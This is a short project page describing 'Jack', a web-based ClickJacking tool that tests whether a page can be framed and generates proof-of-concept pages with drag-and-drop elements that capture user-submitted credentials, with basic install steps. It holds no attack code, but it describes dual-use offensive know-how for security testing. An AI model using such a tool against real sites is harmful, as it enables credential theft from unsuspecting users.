ClickJacking is a longstanding vulnerability which has been around since the inception of the World Wide Web. With ClickJacking, it's easy for attackers to acquire user-submitted credentials.
To raise awareness of this issue, we introduced Jack, part of our Web Application toolkit, and launched it at the BlackHat Arsenal in Amsterdam in 2015.
Jack allows implementers to test if a specific web resource is vulnerable to ClickJacking and if so, allows the easy generation of a ClickJacking Proof of Concept (PoC) in order to trick users into submitting credentials.
- Drag 'n Drop functionality for users to position and create malicious elements in order to capture user-submitted input.
- Ability to generate local PoC instances of the ClickJackable resource and deploy to a web container, such as Apache
Jack is web based and requires a web server to serve its HTML and JavaSript content. This can be remotely or locally. To install, git clone the directory and copy the contents into a folder that is accessible to the web server. Finally, open "index.html" with your browser and you are ready to use it.
Jack in Action
Jack can be downloaded from our Github page